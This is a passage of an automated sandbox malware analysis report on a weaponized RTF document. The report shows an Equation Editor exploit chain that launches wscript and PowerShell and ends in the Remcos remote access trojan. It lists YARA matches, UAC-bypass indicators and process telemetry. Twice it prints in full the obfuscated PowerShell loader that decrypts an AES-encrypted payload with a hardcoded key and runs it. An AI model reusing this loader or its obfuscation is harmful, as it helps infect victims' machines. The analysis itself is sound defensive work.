                Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
                Very long command line found
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116Jump to behavior
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_004167B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_002A96696_2_002A9669
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043E0CC8_2_0043E0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041F0FA8_2_0041F0FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004541598_2_00454159
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004381688_2_00438168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004461F08_2_004461F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043E2FB8_2_0043E2FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0045332B8_2_0045332B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042739D8_2_0042739D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004374E68_2_004374E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043E5588_2_0043E558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004387708_2_00438770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004378FE8_2_004378FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004339468_2_00433946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044D9C98_2_0044D9C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00427A468_2_00427A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041DB628_2_0041DB62
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00427BAF8_2_00427BAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00437D338_2_00437D33
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00435E5E8_2_00435E5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00426E0E8_2_00426E0E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043DE9D8_2_0043DE9D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00413FCA8_2_00413FCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00436FEA8_2_00436FEA
                Source: ~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                Source: 4vzwJTZbwT.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winRTF@8/18@2/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_00417952
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_0040F474
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_0041B4A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AA4A
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$zwJTZbwT.rtfJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-9R4HLX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR752F.tmpJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................................................................T..........s......!.....Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.......................................................................!.......................!.....Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
